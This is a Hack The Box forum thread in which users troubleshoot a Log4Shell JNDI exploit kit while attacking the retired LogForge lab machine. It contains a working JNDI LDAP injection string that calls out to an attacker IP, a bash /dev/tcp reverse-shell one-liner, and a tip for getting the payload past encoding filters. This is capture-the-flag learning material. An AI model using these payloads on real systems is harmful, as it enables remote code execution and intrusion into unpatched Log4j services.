LogForge Help

HTB Content Machines
,
1

I’ve been going through some retired HTB boxes and was trying to do LogForge using HTB’s PwnBox. I get up to the point where I’m using the ****-Exploit-Kit and I have the payload ready to go. However, when using the exploit, tcpdump will say it connects correctly to the **AP server then redirect to port 8081 for a subsequent payload but that last redirection doesn’t happen at all. ****-Exploit-Kit doesn’t send the payload. I’m not sure if anyone else has had any luck using PwnBox for this machine. I also tried using a personal Parrot VM but hit the same problem. I’m following a walkthrough/write-up and the exploit kit should be sending the payload right after it says “redirecting to XYZ”.

2

I don’t have the walk-through to reference… from my notes if I am looking at the right part anyway, it looks like I used the kit to generate the payload (assuming your talking about the JNDI exploit kit? ) and then either use Burp or tomcat to actually send the payload. Hopefully that makes sense/helps. Also if you didn’t already I would highly recommend watching ippsec’s video on youtube of the box.

3

I tried to use Burp to send the payload and I also tried doing it directly via the web GUI. I have watched Ippsec’s video and I was hoping to follow it because his stuff is really good and detailed. I wasn’t able to get the same results as him though. Maybe I’ll try again another time.

1 Like
4

Same issue here. I can’t replicate the walkthroughs… :frowning:

I followed ippsec’s video walkthrough and just like @_dials , it says “redirecting to port 8081…” instead of displaying the serialized payload like in ippsec’s video.

I was able to get it to display the serialized payload by utilizing the dynamic generation functionality of the ****-Exploit-Kit, like this:

${jndi:ldap://10.10.14.3:1389/serial/CommonsCollections5/exec_unix/Y3VybCAxMC4xMC4xNC4zOjkwMDIK}

However, it doesn’t look like it ever executes the payload server-side (I didn’t see any ICMP packets come back in tcpdump)

5

I finally figured this bug out after half a day!
writeups no longer valid but reverse shell still possible:

  1. install Java 11:
    source: java - log4shell POC : no HTTP redirect - Stack Overflow

  2. don’t use the JNDI links, instead use ldap://IP:PORT/serial/[payload_name]/exec_unix/[base64_command]
    Hint : have you decoded the given example? is that what you want to run?

  3. use this revere shell:
    bash -c “0<&196;exec 196<>/dev/tcp/IP/PORT; sh <&196 >&196 2>&196”
    source: Reverse Shells | OSCP Notes

Optional Hint: if base64 “+” is rejected, would %2B work instead?

first time contributing to the community :slight_smile:
cheers